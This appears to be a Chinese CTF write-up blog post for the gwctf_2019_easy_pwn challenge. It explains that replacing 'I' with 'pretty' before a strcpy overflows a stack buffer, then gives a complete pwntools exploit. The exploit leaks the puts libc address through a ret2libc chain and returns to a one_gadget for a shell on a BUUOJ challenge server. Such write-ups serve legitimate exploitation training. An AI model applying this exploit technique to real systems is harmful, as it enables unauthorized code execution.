【pwn】gwctf_2019_easy_pwn

本文分析了一个C++程序的安全漏洞,探讨了在字符串替换过程中导致的缓冲区溢出问题,并通过实例展示了如何利用该漏洞进行PWN攻击,获取程序控制权。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

例行检查
在这里插入图片描述分析程序,这个程序是c++写的。在往s中read的时候大小没有问题,但是程序在下面将字符"I"替换成了"pretty",最后在strcpy的时候发生了溢出,没有PIE和canary直接利用即可。

from pwn import *

io=remote('node3.buuoj.cn','27671')
puts_plt=0x8048DC0
puts_got=0x804C068
main=0x8049091
pl='I'*16+p32(puts_plt)+p32(main)+p32(puts_got)
io.send(pl)
io.recvuntil('pretty'*16)
io.recv(12)
puts_add=u32(io.recv(4))
print(hex(puts_add))
one_gadget=puts_add-0x05f140+0x5f066
#sys=puts_add-0x24800
#sh=puts_add+0xf9eeb
#pl2='I'*16+p32(sys)+'dead'+p32(sh)
pl2='I'*16+p32(one_gadget)
io.send(pl2)

io.interactive()
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值